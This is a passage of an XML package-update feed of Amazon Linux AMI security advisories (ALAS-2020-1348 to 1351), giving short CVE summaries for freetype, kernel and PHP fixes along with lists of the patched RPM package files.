version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.14-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1348</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1348: medium priority package update for freetype</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-9382:
FreeType before 2.6.1 has a buffer over-read in skip_comment in psaux/psobjs.c because ps_parser_skip_PS_token is mishandled in an FT_New_Memory_Face operation.
1763609: CVE-2015-9382 freetype: mishandling ps_parser_skip_PS_token in an FT_New_Memory_Face operation in skip_comment, psaux/psobjs.c, leads to a buffer over-read
CVE-2015-9381:
FreeType before 2.6.1 has a heap-based buffer over-read in T1_Get_Private_Dict in type1/t1parse.c.
1752788: CVE-2015-9381 freetype: a heap-based buffer over-read in T1_Get_Private_Dict in type1/t1parse.c leading to crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9381" title="" id="CVE-2015-9381" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9382" title="" id="CVE-2015-9382" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-demos" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-19.15.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-19.15.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-19.15.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-19.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1349</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1349: medium priority package update for kernel</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20096:
In the Linux kernel before 5.1, there is a memory leak in __feat_register_sp() in net/dccp/feat.c, which may cause denial of service, aka CID-1d3ff0950e2b.
1791959: CVE-2019-20096 kernel: memory leak in __feat_register_sp() in net/dccp/feat.c
CVE-2019-15918:
An issue was discovered in the Linux kernel before 5.0.10. SMB2_negotiate in fs/cifs/smb2pdu.c has an out-of-bounds read because data structures are incompletely updated after a change from smb30 to smb21.
1760550: CVE-2019-15918 kernel: out-of-bounds read in fs/cifs/smb2pdu.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15918" title="" id="CVE-2019-15918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20096" title="" id="CVE-2019-20096" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.171-105.231.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1350</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1350: medium priority package update for php72</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7063:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when creating PHAR archive using PharData::buildFromIterator() function, the files are added with default permissions (0666, or all access) even if the original files on the filesystem were with more restrictive permissions. This may result in files having more lax permissions than intended when such archive is extracted.
1808536: CVE-2020-7063 php: files added to tar with Phar::buildFromIterator have all-access permissions
CVE-2020-7062:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when using file upload functionality, if upload progress tracking is enabled, but session.upload_progress.cleanup is set to 0 (disabled), and the file upload fails, the upload procedure would try to clean up data that does not exist and encounter null pointer dereference, which would likely lead to a crash.
1808532: CVE-2020-7062 php: NULL pointer dereference in PHP session upload progress
CVE-2020-7061:
In PHP versions 7.3.x below 7.3.15 and 7.4.x below 7.4.3, while extracting PHAR files on Windows using phar extension, certain content inside PHAR file could lead to one-byte read past the allocated buffer. This could potentially lead to information disclosure or crash.
1808529: CVE-2020-7061 php: heap-based buffer overflow in phar_extract_file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7061" title="" id="CVE-2020-7061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7062" title="" id="CVE-2020-7062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7063" title="" id="CVE-2020-7063" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.28-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1351</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1351: medium priority package update for php73</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7063:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when creating PHAR archive using PharData::buildFromIterator() function, the files are added with default permissions (0666, or all access) even if the original files on the filesystem were with more restrictive permissions. This may result in files having more lax permissions than intended when such archive is extracted.
1808536: CVE-2020-7063 php: files added to tar with Phar::buildFromIterator have all-access permissions
CVE-2020-7062:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when using file upload functionality, if upload progress tracking is enabled, but session.upload_progress.cleanup is set to 0 (disabled), and the file upload fails, the upload procedure would try to clean up data that does not exist and encounter null pointer dereference, which would likely lead to a crash.
1808532: CVE-2020-7062 php: NULL pointer dereference in PHP session upload progress
CVE-2020-7061:
In PHP versions 7.3.x below 7.3.15 and 7.4.x below 7.4.3, while extracting PHAR files on Windows using phar extension, certain content inside PHAR file could lead to one-byte read past the allocated buffer. This could potentially lead to information disclosure or crash.
1808529: CVE-2020-7061 php: heap-based buffer overflow in phar_extract_file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7061" title="" id="CVE-2020-7061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7062" title="" id="CVE-2020-7062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7063" title="" id="CVE-2020-7063" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-mbstring" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.15" release="1.24.amzn1" epoch="0" 